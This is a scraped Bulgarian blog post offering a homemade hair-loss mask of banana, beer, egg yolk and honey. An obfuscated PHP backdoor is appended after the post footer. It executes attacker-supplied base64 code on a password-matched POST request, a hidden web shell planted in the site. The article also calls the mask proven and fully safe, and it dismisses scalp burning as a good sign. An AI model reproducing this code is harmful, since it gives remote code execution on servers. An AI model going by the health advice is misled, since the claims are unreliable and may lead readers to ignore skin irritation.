Мощна комбинация спира косопада и засилва растежа! Виж Тук: | Косопад

Мощна комбинация спира косопада и засилва растежа! Виж Тук:

kosa-maska-6

Предлагаме ви рецепта за мощна природна комбинация, която ще спре косопада и ще накара косата ви да расте отново.

Всички съставки са с доказано действие в тези две направления, освен това са напълно безопасни.

Бананът има ценни свойства, полезни за здравето, а също и за косата. Освен да ги ядем, можем да ги включваме в различни рецепти за външна употреба. Едно от полезните му действия е, че спира косопада.

Яйцето също е важен съюзник за разрешаването на различни проблеми, свързани с косата и скалпа. Правят косата здрава, предпазват я от късане, правят я мека и помагат за растежа й. Яйцето възстановява естествените мазнини на косъма, като по този начин не изсушава косата.

kosa-maska-4

Медът е често срещана съставка в маските за коса. Прави я мека и я хидратира. Действа като балсам и стимулира растежа на косата.

Бирата е изключително полезна за косата. Едно от ценните й свойства е, че подпомага растежа. Ако искате да накарате косата си да расте, опитайте първо с бира – за външна употреба.

Ето ги и съставките за маската срещу косопад и за растеж на косата:

–1/2 банан
–100 мл бира
–1 суров жълтък
–2 лъжици мед

Смесваме всички съставки с блендера и разбиваме, докато получим хомогенна смес.

Начин на приложение:
Нанасяме върху скалпа и оставяме да действа два часа. Може да усетите леко парене, но не се притеснявайте. Означава, че кожата ви реагира добре на сместа.

20. април 2017 17:45:18 от Надя Колева
Категории: Рецепти при косопад | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}